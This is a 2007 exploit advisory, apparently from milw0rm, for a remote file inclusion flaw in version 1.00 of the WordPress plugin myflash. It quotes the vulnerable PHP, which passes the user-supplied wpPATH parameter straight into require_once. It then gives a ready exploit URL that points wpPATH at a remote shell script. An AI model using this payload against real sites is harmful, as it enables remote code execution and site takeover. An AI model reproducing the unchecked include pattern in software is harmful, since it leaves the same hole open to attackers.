48 lines
No EOL
1.3 KiB
Text
48 lines
No EOL
1.3 KiB
Text
--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------
|
|
|
|
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
|
|
|
|
--------------------------------------------------------------------------------
|
|
#Author: Crackers_Child
|
|
|
|
|
|
#cont@ct: cybermilitan@hotmail.com
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
|
|
------------------------- -------------------------------------------------------
|
|
|
|
Application : Wordpress plugin
|
|
|
|
Web Site : http://alexrabe.boelinger.com/
|
|
|
|
--------------------------------------------------------------------------------
|
|
Vuln Ä°n myflash-button.php
|
|
|
|
if (!$_POST) $wppath=$_GET['wpPATH'];
|
|
else $wppath=$_POST['wpPATH'];
|
|
|
|
require_once($wppath.'/wp-config.php');
|
|
require_once($wppath.'/wp-admin/admin.php');
|
|
|
|
global $wpdb;
|
|
--------------------------------------------------------------------------------
|
|
|
|
Exploit:
|
|
|
|
http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
greets:
|
|
|
|
Every Body
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
|
|
|
|
# milw0rm.com [2007-05-01] |